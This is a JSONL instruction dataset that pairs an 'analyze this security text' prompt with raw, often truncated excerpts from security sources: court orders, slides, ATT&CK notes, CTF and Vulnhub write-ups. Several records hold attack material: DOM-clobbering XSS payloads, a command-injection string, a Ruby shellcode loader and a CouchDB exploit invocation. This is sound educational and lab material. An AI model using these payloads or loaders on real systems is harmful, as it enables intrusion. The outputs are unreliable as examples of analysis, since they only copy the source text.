{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 WO IN THE UNITED STATES DISTRICT COURT FOR THE DISTRICT OF ARIZONA MDY Industries, LLC, Plaintiff/Counterdefendant, vs. Blizzard Entertainment, Inc.; and Vivendi Games, Inc., Defendants/Counterclaimants. __________________________________ Blizzard Entertainment, Inc.; and Vivendi Games, Inc., Third-Party Plaintiffs, vs. Michael Donnelly, Third-Party Defendant. ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) No. CV-06-2555-PHX-DGC ORDER This case concerns the hugely popular World of Warcraft computer game (WoW) and a software program known as Glider that plays WoW for its owners while those owners are away from their computer keyboards. The Court previously held Plaintiff/ Counterdefendant MDY Industries, Inc. (MDY)  the owner and distributor of Glider  liable to Blizzard Entertainment, Inc. and Vivendi Games, Inc. (collectively, Blizzard)  the owners and distributors of WoW  for tortious interference with contract, contributory 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 1The general facts in this background section are found by the Court on the basis of evidence presented at trial and the parties pretrial stipulations. See Dkt. ##88, 97. The Court will provide additional issue-specific findings later in this order. - 2 - copyright infringement, and vicarious copyright infringement. Dkt. #82. The Court granted summary judgment to MDY on the portion of Blizzards claim based on 17 U.S.C.  1201(a)(2) that applied to Blizzards game client software code. The Court also granted summary judgment in favor of MDY on Blizzards unfair competition claim. Id. Following this ruling, the parties entered into a stipulation that Blizzard would recover $6,000,000 in damages from MDY on the tortious interference, contributory copyright infringement, and vicarious copyright infringement claims if any of those claims is affirmed on appeal. Dkt. #95. The parties agreed that the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Dom Clobbering > DOM Clobbering is a technique where global variables can be overwritten or \"clobbered\" by naming HTML elements with certain IDs or names. This can cause unexpected behavior in scripts and potentially lead to security vulnerabilities. ## Summary * [Lab](#lab) * [Exploit](#exploit) * [References](#references) ## Lab * [Lab: Exploiting DOM clobbering to enable XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering) * [Lab: Clobbering DOM attributes to bypass HTML filters](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-clobbering-attributes-to-bypass-html-filters) * [Lab: DOM clobbering test case protected by CSP](https://portswigger-labs.net/dom-invader/testcases/augmented-dom-script-dom-clobbering-csp/) ## Exploit Exploitation requires any kind of `HTML injection` in the page. * Clobbering `x.y.value` ```html // Payload <form id=x><output id=y>I've been clobbered</output> // Sink <script>alert(x.y.value);</script> ``` * Clobbering `x.y` using ID and name attributes together to form a DOM collection ```html // Payload <a id=x><a id=x name=y href=\"Clobbered\"> // Sink <script>alert(x.y)</script> ``` * Clobbering `x.y.z` - 3 levels deep ```html // Payload <form id=x name=y><input id=z></form> <form id=x></form> // Sink <script>alert(x.y.z)</script> ``` * Clobbering `a.b.c.d` - more than 3 levels ```html // Payload <iframe name=a srcdoc=\" <iframe srcdoc='<a id=c name=d href=cid:Clobbered>test</a><a id=c>' name=b>\"></iframe> <style>@import '//portswigger.net';</style> // Sink <script>alert(a.b.c.d)</script> ``` * Clobbering `forEach` (Chrome only) ```html // Payload <form id=x> <input id=y name=z> <input id=y> </form> // Sink <script>x.y.forEach(element=>alert(element))</script> ``` * Clobbering `document.getElementById()` using `<html>` or `<body>` tag with the same `id` attribute ```html // Payloads <html id=\"cdnDomain\">clobbered</html> <svg><body id=cdnDomain>clobbered</body></svg", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# caas Web, 150 points ## Description > Now presenting cowsay as a service A Javascript file was attached: ```javascript const express = require('express'); const app = express(); const { exec } = require('child_process'); app.use(express.static('public')); app.get('/cowsay/:message', (req, res) => { exec(`/usr/games/cowsay ${req.params.message}`, (error, stdout) => { if (error) return res.status(500).end(); res.type('txt').send(stdout).end(); }); }); app.listen(3000, () => { console.log('listening'); }); ``` ## Solution Visiting the attached website, we see the following page: ``` Cowsay as a Service Make a request to the following URL to cowsay your message: https://caas.mars.picoctf.net/cowsay/{message} ``` Let's try it: ```console (user@kali)-[/media/sf_CTFs/pico/caas] $ curl https://caas.mars.picoctf.net/cowsay/test ______ < test > ------ \\ __ \\ (oo)\\_______ (__)\\ )\\/\\ ||----w | || || ``` Indeed, looks like `cowsay` as a service. According to the implementation, the code calls: ```javascript exec(`/usr/games/cowsay ${req.params.message}` ``` So we can try to perform a command injection by sneaking in an additional command after ending the current one with a `;`. ```console (user@kali)-[/media/sf_CTFs/pico/caas] $ curl \"https://caas.mars.picoctf.net/cowsay/Hello; grep -r pico\" _______ < Hello > ------- \\ __ \\ (oo)\\_______ (__)\\ )\\/\\ ||----w | || || falg.txt:picoCTF{moooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0o} ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1608-005-阶段性能力-Link Target ## 来自ATT&CK的描述 攻击者可能会将链接所引用的资源放在适当的位置以便在针对特定目标时使用攻击者可能依靠用户点击一个恶意链接来泄露信息包括证书或获得执行如恶意链接链接可用于鱼叉式网络钓鱼如发送一封电子邮件并伴有社会工程文本以哄骗用户主动点击或在浏览器中复制和粘贴一个URL在网络钓鱼获取信息如鱼叉式链接或网络钓鱼获得对系统的初始访问如鱼叉式链接之前攻击者必须为鱼叉式链接的链接目标设置资源 通常情况下链接目标的资源将是一个HTML页面可能包括一些客户端脚本如JavaScript以及决定向用户提供什么内容攻击者可能会克隆合法网站作为链接目标这可能包括克隆合法网络服务的登录页面或组织的登录页面在鱼叉式网络钓鱼链接期间获取凭据 在获取基础设施域名期间攻击者可能会购买与合法域名相似的域名例如同音字错别字不同的顶级域名等以帮助促进恶意链接也可以使用短域名服务 ## 测试案例 暂无 ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 ### 缓解措施 这种技术不容易用预防控制来缓解因为它是基于企业防御和控制范围之外的行为 ### 检测 这种活动的大部分将发生在目标组织的可见性之外因此很难检测到这种行为检测工作可能集中在攻击生命周期的其他阶段例如在网络钓鱼链接或恶意链接期间 ## 参考推荐 MITRE-ATT&CK-T1608-005 <https://attack.mitre.org/techniques/T1608/005/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n自 动 化 漏 洞 扫 描 系 统 开 发 和 应 用 李斌 系 统 建 设 背 景 Ø 互联网应用系统大量使用开源软件和应用组件且系统迭代快可能 存在各种安全漏洞依靠手工检测需要投入大量人力 Ø 通过建设自动化漏洞扫描系统实现安全资产统一管理漏洞自动化 检测和安全漏洞生命周期管理提升漏洞发现效率和能力降低漏洞 被利用风险 系 统 建 设 目 标 ü IP和端口 ü 中间件及版本 ü 组件库及版本 ü 数据库 ü 进程 ü 运行用户 ü 域名和URL ü 端口开放 ü 系统和中间件漏洞 ü 弱口令未授权访问 ü Web安全漏洞 ü 漏洞确认 ü 漏洞复核 ü 漏洞跟踪和管理 ü 统计和报表 安全资产 管理 漏洞自动化 扫描 漏洞生命 周期管理 系 统 功 能 架 构 n 安全资产管理模块 n 漏洞扫描模块 n 漏洞管理模块 系 统 开 发 和 设 计 思 路 1技术和开发语言 ü Python3后台 ü DjangoWeb前端和交互 ü MySQL数据库 2设计思路 ü 重度资产管理被动+主动收集 ü 尽量使用成熟开源组件和漏洞扫描模块进行二次开发 ü 架构需有良好的扩展性 ü 考虑POC和漏洞库可维护性 安 全 资 产 管 理 系 统 n 被动为主主动为辅 n 全网覆盖 n 持续更新 安 全 资 产 管 理 - 被 动 采 集 模 块 利用Agent执行shell命令取服务器上资产信息 ü TCP监听端口进程ID和进程名 ü 进程运行用户进程运行命令 ü 所有部署的应用程序微服务列表 ü 服务器上用户列表 ü 服务器上类库主要是jar包及版本依赖标准化路径 安 全 资 产 管 理 - 主 动 采 集 模 块 WINDOWS主机信息 Masscan Nmap URL列表 WIG Accesslog 特定组件和版本信息 运维自动化平台API 漏 洞 扫 描 模 块 n 调度器统一管理和调度扫描任 务管理扫描模块 n 扫描模块插拔式增加 n 安全资产管理系统提供输入源 漏 洞 扫 描 调 度 引 擎 1扫描模块注册 2任务创建 l 任务名称 l 任务类型调用哪个扫描模块 l 扫描目标可以是IP或者是IP+端口或者是URL等 l 扫描参数比如专门扫描SQL注入漏洞 3任务调度和管理 l 队列中扫描中扫描结束 l 终止暂停恢复 l 定时任务 l 完成扫描 4结果解析入库 l 任务ID标题级别类型 l 漏洞详情建议为JSON格式包括漏洞所有明细信息如漏 洞的IP漏洞端口探测方法漏洞检测返回信息漏洞 CVE描述等每种漏洞的详情可以不同 边 界 端 口 开 放 扫 描 1端口扫描模块外网 用于扫描互联网对外开放IP和端口 2端口扫描模块广域网边界 用于扫描广域网边界开放IP和端口情况如办公内网 和IDC之间开放端口情况外联区专线VPN边界 开放端口情况 3扫描结果接收接口 用于接收扫描结果建议扫描结果为JSON格式接收 结果后入库 系 统 漏 洞 扫 描 OpenVAS 1Docker安装和部署 2Openvas_lib库二次开发 l 任务终止功能 l 扫描结果字段格式化解析 l 扫描端口优化提升扫描效率 中 间 件 漏 洞 扫 描 巡风系统-扫描模块 ü vulscan.py ü Vuldb漏洞POC库 ü 支持全模块或单独某个模块扫描 ü 弱口令字典自定义 W E B 漏 洞 扫 描 Wapiti3.0 Wapiti是开源的Web应用漏洞扫描系统 -黑盒漏洞扫描系统通过爬取网页获 取网页结构表单和参数输入点通过 注入payload检测是否存在安全漏洞 主要功能如下 ü 文件包含 ü 注入 ü XSS ü 命令执行 ü CRLF ü XXE ü SSRF ü 敏感信息泄露 二次开发和整合 l 支持手动输入cookie l 可选择单独模块或全扫描 l 扫描参数自定义爬虫深 度代理等 l 漏洞扫描结果解析 漏 洞 管 理 模 块 1漏洞管理功能 ü 用户管理登录和权限管理 ü 安全资产管理 ü 漏洞扫描任务管理 ü 漏洞扫描结果管理 ü 统计报表和导出功能 2开发实现 ü Django Web框架 ü 任务输入和前后端交互 ü 前端模块BootstrapJquery LayuiEcharts 漏 洞 管 理 系 统 应 用 实 践 1持续运营确保资产库新鲜全面 2漏洞库持续更新POC手动编写和更新 3定期开展漏洞扫描控制扫描强度 4漏洞发现要从多方面入手自动化扫描是其中重要一环 欢迎交流 安全+ 专注于信息安全行业通过互联网平台线下沙龙培 训峰会人才招聘等多种形式培养安全人才提升行业的整体 素质助推安全生态圈的健康发展 官方网站www.anquanjia.net.cn 微信公众号anquanplus", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOPERATOR HANDBOOK SEARCH.COPY.PASTE.L33T;) RED TEAM + OSINT + BLUE TEAM NETMUX V1 [02APR2020] 2 Operator Handbook. Copyright  2020 Netmux LLC All rights reserved. Without limiting the rights under the copyright reserved above, no part of this publication may be reproduced, stored in, or introduced into a retrieval system, or transmitted in any form or by any means (electronic, mechanical, photocopying, recording, or otherwise) without prior written permission. ISBN-10: 9798605493952 Operator Handbook, Operator Handbook Logo, Netmux, and the Netmux logo are registered trademarks of Netmux, LLC. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. The information in this book is distributed on an As Is basis, without warranty. While every precaution has been taken in the preparation of this work, neither the author nor Netmux LLC, shall have any liability to any person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information contained in it. While every effort has been made to ensure the accuracy and legitimacy of the references, referrals, and links (collectively Links) presented in this book/ebook, Netmux is not responsible or liable for broken Links or missing or fallacious information at the Links. Any Links in this book to a specific product, process, website, or service do not constitute or imply an endorsement by Netmux of same, or its producer or provider. The views and opinions contained at any Links do not necessarily express or reflect those of Netmux. 3 INFOSEC TWITTER ACKNOWLEDGEMENT @ABJtech @Mandiant @bmenell @m33x @ACKFlags @ManuscriptMaps @bmenrigh @m3g9tr0n @AGoldmund @Mao_Ware @bostongolang @m8urnett @ASTRON_NL @MariNomad", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMark Ryan del Moral Talabis Dangerous Minds: The Art of Guerrilla Data Mining DEFCON 2009 2 Background  Security Analytics:  Concept of using data mining and AI in security  Presented techniques and theories that we could use  This Talk:  Move from theory to practical applications  Provide scenarios and examples to leverage these techniques for your research DEFCON 2009 3 Introduction  Traditional warfare vs. Information Security  Very similar  Reconnaissance, information gathering, and espionage play an important part in battle tactics DEFCON 2009 4 This is Sparta!  Anyone watched 300?  Spartans: they knew and understood the terrain  Persians: They did not win because of overwhelming numbers, they actually won because someone told them about a hidden pass. DEFCON 2009 5 Information Security  In information security:  Not only in hacking systems  The more information you have, youll have a better chance to protect you organization  Drafting good policies and procedures as well as picking the correct tools and techniques based on the information that you have. DEFCON 2009 6 Words of Wisdom  It is said that if you know your enemies and know yourself, you will not be imperiled in a hundred battles - Sun Tzu DEFCON 2009 7 Information Warfare  Information Warfare  The use and management of information in pursuit of a competitive advantage over an opponent  Information are just 1s and 0s if not used properly  Analysis makes information meaningful - INTELLIGENCE DEFCON 2009 8 The Business of Information Warfare  People who are into the Information Warfare Business:  CIA  FBI  NSA  Information Awareness Office  Foreign Governments DEFCON 2009 9 Projects  Government Projects:  ECHELON  TALON  ADVISE  MATRIX  Able Danger  Large endeavors! DEFCON 2009 10 Challenges  Amount of data: theres just too much  Resources: way too little Intelligence Data Data Data Challenge DEFCON 2009 11 The Veritas Project  Veritas is latin for Truth  The Veritas Project  Modeled in the same general", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我是衬衫 忍者的帅气同学罢了 昨天晚上睡觉前做了两个小时的DarkCon的 CTF 然后今天我 看题目更新了 正好在向忍者师傅语音传授如何变得向我一样帅 然后我就发了题目链接给 他 1. WTF PHP 直接上传 php 后缀的文件没有任何的限制很简单 然后进入之后 phpinfo 看 disable_function pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcnt l_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus, pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler, pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigp rocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpri ority,pcntl_setpriority,pcntl_async_signals,error_log,link,symlink,s yslog,ld,mail,exec,passthru,shell_exec,system,proc_open,popen,curl_e xec,curl_multi_exec,parse_ini_file,show_source,highlight_file,file,f open,fread,var_dump,readfile Flag 在/etc 目录下 直接 scandir 拿到路径 file_get_contents 就可以了 2. Easy PHP 题目要求不允许爆破 然后我第一件事情就是爆破 发现 robots.txt ?lmao 直接访问 index.php?Lmao 返回源代码 preg_replace 的命令执行 nic3=/a/e 然后 bruh 就是得找一个函数 这个函数需要通过 is_payload_danger 的过滤 要不然不行 我试了一下 eval 通过了 使用 eval(chr(ascii code))的方法 3. Capture the MEME 打开界面就是一个和我一样帅的人的 MEME 图片 我和忍者师傅的关注点一直停留在 URL 这里 我一开始没看题目内容 以为是 SSRF 什么的 后面看了提示的内容是 flag at /etc/flag.txt 我看了一会发现 Export 之后是 PDF 我直接就想到了 Nahamsec 之前那个 SSRF 的分享 我想了好几种在 URL 那里的思路 我以为是 URL 的位置是关键 弄了半天 但是最 后才发现这个 Top Text 这里才是关键直接插入 HTML 标签就可以了 直接用这个 Payload 就可以获取到 Flag 第一次打这种 CTF 虽然一共就做了三道题 比 LOL 好玩多了 总体来说题目简单的一笔 感觉再国内的比赛里面活不过第一集 好了 我去打 LOL 了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game Joshua jduck Drake, Zimperium Steve Christey Coley, MITRE DEF CON 24 Aug 7th, 2016 Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game - DEF CON 24  About Josh  20-years of VR, Ran iDefense VCP  About Steve  CVE, Responsible Disclosure (sorry), CVSS, CWE, ...  Why we are doing this  Currently, there is *way* more insecure code out there than researchers. This isn't guaranteed in 10 years, though.  We need more people looking at code thats deployed in the real world  We hope to encourage more people to get involved 2 Introductions Josh & Steve - Intros / Steve to finish Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game - DEF CON 24  This is our opinion only  Based on our own career experiences  Others have their own opinions  YOU proving the cliche are a unique snowflake  Youll find your own way, but hopefully we can help you find it faster  No new sploits here 3 Disclaimers Steve Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game - DEF CON 24 Vulnerabilities != Exploits A Vulnerability resides in the software itself, doing nothing on its own An Exploit is a set of steps (possibly manual, or in the form of a program) that interacts with the software in a way that has a non-zero chance of successfully taking advantage of a vulnerability https://twitter.com/mholt6/status/529797274658807810 4 What is a Vulnerability? Steve Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game - DEF CON 24  Too many definitions...  Roughly: a mistake in a systems design or implementation that allows an attacker to conduct activities that (1) affect other users and (2) are not explicitly allowed or intended by the developer or sysadmin.  What do you have? vs. What do you get?  there must be a difference 5 What is a Vulnerability? Josh Vulnerabilities 101: How to Launch or Improve Your Vulnerability Resea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n本季是为配合msf在渗透过程中无文件渗透提前做基础过度也为msf插件编写做基础过度 ### ruby shellcode 生成如下 ```ruby msfvenom p windows/messagebox TEXT=Micropoor TITLE=Micropoor f ruby smallest ``` ![](media/56aa6d4fb31384a6c8f8e972e66f9a2b.jpg) ![](media/708fd97e6cb1c45afd361b8b53e6ffc5.jpg) ### 附源码 ```ruby require 'fiddle' require 'fiddle/import' require 'fiddle/types' # msfvenom p windows/messagebox TEXT=Micropoor TITLE=Micropoor f ruby smallest shellcode = \"\\\\xd9\\\\xeb\\\\x9b\\\\xd9\\\\x74\\\\x24\\\\xf4\\\\x31\\\\xd2\\\\xb2\\\\x77\\\\x31\\\\xc9\\\\x64\" + \"\\\\x8b\\\\x71\\\\x30\\\\x8b\\\\x76\\\\x0c\\\\x8b\\\\x76\\\\x1c\\\\x8b\\\\x46\\\\x08\\\\x8b\\\\x7e\" + \"\\\\x20\\\\x8b\\\\x36\\\\x38\\\\x4f\\\\x18\\\\x75\\\\xf3\\\\x59\\\\x01\\\\xd1\\\\xff\\\\xe1\\\\x60\" + \"\\\\x8b\\\\x6c\\\\x24\\\\x24\\\\x8b\\\\x45\\\\x3c\\\\x8b\\\\x54\\\\x28\\\\x78\\\\x01\\\\xea\\\\x8b\" \"\\\\x4a\\\\x18\\\\x8b\\\\x5a\\\\x20\\\\x01\\\\xeb\\\\xe3\\\\x34\\\\x49\\\\x8b\\\\x34\\\\x8b\\\\x01\" \"\\\\xee\\\\x31\\\\xff\\\\x31\\\\xc0\\\\xfc\\\\xac\\\\x84\\\\xc0\\\\x74\\\\x07\\\\xc1\\\\xcf\\\\x0d\" \"\\\\x01\\\\xc7\\\\xeb\\\\xf4\\\\x3b\\\\x7c\\\\x24\\\\x28\\\\x75\\\\xe1\\\\x8b\\\\x5a\\\\x24\\\\x01\" \"\\\\xeb\\\\x66\\\\x8b\\\\x0c\\\\x4b\\\\x8b\\\\x5a\\\\x1c\\\\x01\\\\xeb\\\\x8b\\\\x04\\\\x8b\\\\x01\" \"\\\\xe8\\\\x89\\\\x44\\\\x24\\\\x1c\\\\x61\\\\xc3\\\\xb2\\\\x08\\\\x29\\\\xd4\\\\x89\\\\xe5\\\\x89\" \"\\\\xc2\\\\x68\\\\x8e\\\\x4e\\\\x0e\\\\xec\\\\x52\\\\xe8\\\\x9f\\\\xff\\\\xff\\\\xff\\\\x89\\\\x45\" \"\\\\x04\\\\xbb\\\\x7e\\\\xd8\\\\xe2\\\\x73\\\\x87\\\\x1c\\\\x24\\\\x52\\\\xe8\\\\x8e\\\\xff\\\\xff\" \"\\\\xff\\\\x89\\\\x45\\\\x08\\\\x68\\\\x6c\\\\x6c\\\\x20\\\\x41\\\\x68\\\\x33\\\\x32\\\\x2e\\\\x64\" \"\\\\x68\\\\x75\\\\x73\\\\x65\\\\x72\\\\x30\\\\xdb\\\\x88\\\\x5c\\\\x24\\\\x0a\\\\x89\\\\xe6\\\\x56\" \"\\\\xff\\\\x55\\\\x04\\\\x89\\\\xc2\\\\x50\\\\xbb\\\\xa8\\\\xa2\\\\x4d\\\\xbc\\\\x87\\\\x1c\\\\x24\" \"\\\\x52\\\\xe8\\\\x5f\\\\xff\\\\xff\\\\xff\\\\x68\\\\x72\\\\x58\\\\x20\\\\x20\\\\x68\\\\x6f\\\\x70\" \"\\\\x6f\\\\x6f\\\\x68\\\\x4d\\\\x69\\\\x63\\\\x72\\\\x31\\\\xdb\\\\x88\\\\x5c\\\\x24\\\\x09\\\\x89\" \"\\\\xe3\\\\x68\\\\x72\\\\x58\\\\x20\\\\x20\\\\x68\\\\x6f\\\\x70\\\\x6f\\\\x6f\\\\x68\\\\x4d\\\\x69\" \"\\\\x63\\\\x72\\\\x31\\\\xc9\\\\x88\\\\x4c\\\\x24\\\\x09\\\\x89\\\\xe1\\\\x31\\\\xd2\\\\x52\\\\x53\" \"\\\\x51\\\\x52\\\\xff\\\\xd0\\\\x31\\\\xc0\\\\x50\\\\xff\\\\x55\\\\x08\" include Fiddle kernel32 = Fiddle.dlopen('kernel32') ptr = Function.new(kernel32['VirtualAlloc'], [4,4,4,4], 4).call(0, shellcode.size, 0x3000, 0x40) Function.new(kernel32['VirtualProtect'], [4,4,4,4], 4).c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBy Paul Wouters <paul@xtdnet.nl> _ Theory of DNSSEC _ Using bind with DNSSEC _ Securing .nl with SECREG _ Deploying DNSSEC on large scale Overview presentation PART ONE: DNSSEC _ IPsec basics _ What is Opportunistic Encryption _ Protecting the net with OE _ Installing and Configuring OE _ Securing the wireless: WaveSEC _ Testing OE Overview presentation PART TWO: IPsec _ From To Question Answer _ Clientip Resolver A www.freeswan.nl 193.110.157.9 _ <file> - NS . NS A.ROOT-SERVERS.NET. _ A 198.14.0.4 (GLUE) _ Resolver 198.14.0.4 NS nl. NS NS.DOMAIN-REGISTRY.NL _ A 193.176.144.2 (GLUE) _ Resolver 193.176.144.2 NS freeswan.nl. NS ns.xtdnet.nl. _ A 193.110.157.2 (GLUE) _ Resolver 193.110.157.2 A www.freeswan.nl. A 193.110.157.9 (AUTHORATIVE) Zone view of DNS _ The Root Registry (InterNic/VeriSign/DoD/IANA/IAB/ICANN) _ ROOT-SERVERS.NET (IETF) _ CC:TLD-SERVERS.NET (IETF/RIPE/RIPE NCC) _ The NL Registry DOMAIN-REGISTRY.NL (SIDN) _ (AMS-IX,KPN,NIKHEF,SURFNET,RIPE NCC,NIC.SE,NIC.FR,UUNET) _ Registrar of 157.110.193.IN-ADDR.ARPA. (XTDNET,RIPE,BBC) _ ISP of 157.110.193.IN-ADDR.ARPA. (XTDNET,BBC,EASYNET,INTERNATION) _ Registrant (FreeS/WAN) _ 23 Organisations (+everyone with access to routing or BGP tables) Organisational view of DNS _ Client <-> DHCP Server _ Client <-> Resolver _ Resolver itself (rootfile) _ Resolver's communication to the net _ Various glue records and their update mechanism _ Various nameserver <-> nameserver communication _ Various network <-> network communication Tip Vulnerabilities of DNS: 1) Integrity of data 2) Authenticity of data _ Secure client <-> resolver communication  Secure LAN/DHCP?  DNSSEC aware Resolver on Client(!) _ Secure communication nameservers  Zone transfers (AXFR)  dynamic updates _ Secure data storage integrity  Zonefiles  Caches Tip Protect DNS with digital signatures _ TSIG: Preshared Secret Key to protect AXFR  Strictly speaking not necessary with secure zones  Secure the IP layer  IPsec tunnel between master and slaves  Transfe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ACID: RELOADED > https://download.vulnhub.com/acid/Acid-Reloaded.7z 靶场IP`192.168.32.206` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -p 1-65535 -sV 192.168.32.206 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 01:40 EDT Nmap scan report for 192.168.32.206 Host is up (0.0013s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0) 33447/tcp filtered unknown MAC Address: 00:0C:29:D0:CF:4C (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 5.23 seconds ``` 访问SSH端口提示端口敲门`3.2.1`顺序 ![image-20220906141103271](../../.gitbook/assets/image-20220906141103271.png) 重新扫描端口 ``` (rootkali)-[/tmp] # nmap -p 1-65535 -sV 192.168.32.206 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 02:13 EDT Nmap scan report for 192.168.32.206 Host is up (0.0028s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0) 33447/tcp open http Apache httpd 2.4.10 ((Ubuntu)) MAC Address: 00:0C:29:D0:CF:4C (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds ``` 访问33447端口 ![image-20220906141425676](../../.gitbook/assets/image-20220906141425676.png) 发现一个`/bin`目录 ![image-20220906141724559](../../.gitbook/assets/image-20220906141724559.png) ![image-20220906141741386](../../.gitbook/assets/image-20220906141741386.png) 爆破页面 ``` (rootkali)-[/tmp] # gobuster dir -u http://192.168.32.206:33447/bin -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 2>/dev/null =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) &", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CouchDB Erlang 分布式协议代码执行 (CVE-2022-24706) Apache CouchDB是一个Erlang开发的NoSQL数据库 由于Erlang的特性其支持分布式计算分布式节点之间通过Erlang/OTP Distribution协议进行通信攻击者如果知道通信时使用的Cookie即可在握手包通过认证并执行任意命令 在CouchDB 3.2.1及以前版本中使用了默认Cookie值为monster 参考链接 - <https://docs.couchdb.org/en/3.2.2-docs/cve/2022-24706.html> - <https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/> - <https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/erlang_cookie_rce.rb> - <https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit> ## 漏洞环境 执行如下命令启动一个Apache CouchDB 3.2.1服务 ``` docker compose up -d ``` 服务启动后会监听三个端口 - 5984: Apache CouchDB Web管理接口 - 4369: Erlang端口映射服务epmd - 9100: 集群节点通信和运行时自省服务代码执行实际发生在这个端口中 其中Web管理接口和epmd服务端口是固定的而集群通信接口在Vulhub中是9100实际环境下这个端口通常是随机的我们可以通过epmd服务来获取这个端口的数值 ## Exploit 我们可以使用[这个POC](poc.py)来利用本漏洞这个POC会先通过目标的4369端口epmd服务获取集群通信的端口也就是9100然后再使用默认Cookie来控制节点执行任意命令 ``` python poc.py target-ip 4369 ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nbzcat === 不解压直接查看指定的.bz2文件 ## 补充说明 **bzcat命令** 无需解压缩指定的.bz2文件即可显示解压缩后的文件内容 ### 语法 ```shell bzcat(参数) ``` ### 参数 .bz2压缩文件指定要显示内容的.bz2压缩文件 ### 实例 将`/tmp/man.config`以bzip2格式压缩 ```shell bzip2 -z man.config ``` 此时man.config会变成man.config.bz2 将上面的压缩文件内容读出来 ```shell bzcat man.config.bz2 ``` 此时屏幕上会显示 man.config.bz2 解压缩之后的文件内容", "category": "text_analysis", "source": "security_papers"}
